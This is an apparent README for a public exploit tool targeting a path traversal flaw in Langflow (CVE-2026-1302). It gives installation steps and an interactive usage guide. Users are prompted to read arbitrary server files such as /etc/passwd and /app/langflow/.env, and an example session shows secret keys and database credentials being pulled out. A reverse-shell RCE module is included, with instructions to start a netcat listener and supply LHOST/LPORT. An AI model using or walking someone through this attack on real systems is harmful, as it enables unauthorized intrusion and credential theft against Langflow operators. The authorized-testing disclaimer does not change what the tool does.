Share
## https://sploitus.com/exploit?id=0898CB11-C507-5B77-A020-1B224347B969
# Lang_path 

Langflow Path Traversal Exploit (CVE-2026-1302)

A fully interactive Python script to exploit the path traversal vulnerability in Langflow versions โ‰ค 1.2.1, as described in [GHSAโ€‘vwmfโ€‘pq79โ€‘vjvx](https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx).  
This tool allows an attacker to read arbitrary files from the server and, in some configurations, achieve remote code execution.

## Disclaimer

This tool is intended for authorized security testing and educational purposes only.  
Unauthorized access to computer systems is illegal. The author assumes no responsibility for any misuse or damage caused by this software.  
Use it only against systems you own or have explicit permission to test.

## Installation

1. **Clone the repository**  
   ```bash
   git clone https://github.com/ekomsSavior/Lang_path.git
   cd Lang_path
```

1. Install the required Python package
   ```bash
   pip3 install requests 
   ```
2. Make the script executable (optional)
   ```bash
   chmod +x langflow_exploit.py
   ```

Usage

Run the script and follow the interactive prompts:

```bash
python3 langflow_exploit.py
```

You will be asked to provide:

ยท Target URL: The base URL of the Langflow instance (e.g., http://192.168.1.100:7860).
ยท Continue prompts: If version detection fails or the initial test is inconclusive, you can choose to proceed anyway.
ยท File paths: During interactive mode, you can specify any file path to read (e.g., /etc/passwd, /app/langflow/.env).
ยท LHOST/LPORT: If you choose to attempt remote code execution, provide your IP and a listening port for a reverse shell.

Example Session

```
$ python3 langflow_exploit.py

โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
โ•‘     Langflow Path Traversal Exploit                   โ•‘
โ•‘     CVE-2026-1302 - File Read & RCE                   โ•‘
โ•‘     Affects Langflow <= 1.2.1                         โ•‘
โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

[*] Please provide the target Langflow instance:
Target URL (e.g., http://192.168.1.100:7860): http://10.10.10.50:7860

[*] Target set to: http://10.10.10.50:7860
[+] Target is reachable

[*] Detected Langflow version: 1.2.0
[+] Version appears vulnerable!

[*] Testing for path traversal vulnerability...
[+] VULNERABLE! Successfully read /etc/passwd

[*] Target is vulnerable! Entering interactive mode.

==================================================
Available actions:
  1. Read another file
  2. Attempt RCE (reverse shell)
  3. Exit

Select action (1/2/3): 1
Enter file path to read (e.g., /etc/passwd): /app/langflow/.env

[+] Contents of /app/langflow/.env:
==================================================
SECRET_KEY=supersecretkey123
DATABASE_URL=postgresql://user:pass@localhost/langflow
...
==================================================
```

Remote Code Execution (RCE) Attempt

The script includes a module that tries to upload a malicious component to obtain a reverse shell.
Before selecting option 2, start a netcat listener in a separate terminal:

```bash
nc -lvnp 4444
```

Then follow the prompts to provide your IP (LHOST) and the same port (LPORT).
If successful, you will see a connection in your listener terminal.

Note: RCE success depends on the target configuration. The file read functionality is the primary reliable exploit.

References

ยท Langflow Security Advisory GHSAโ€‘vwmfโ€‘pq79โ€‘vjvx
ยท CVE-2026-1302 Details
ยท Langflow GitHub Repository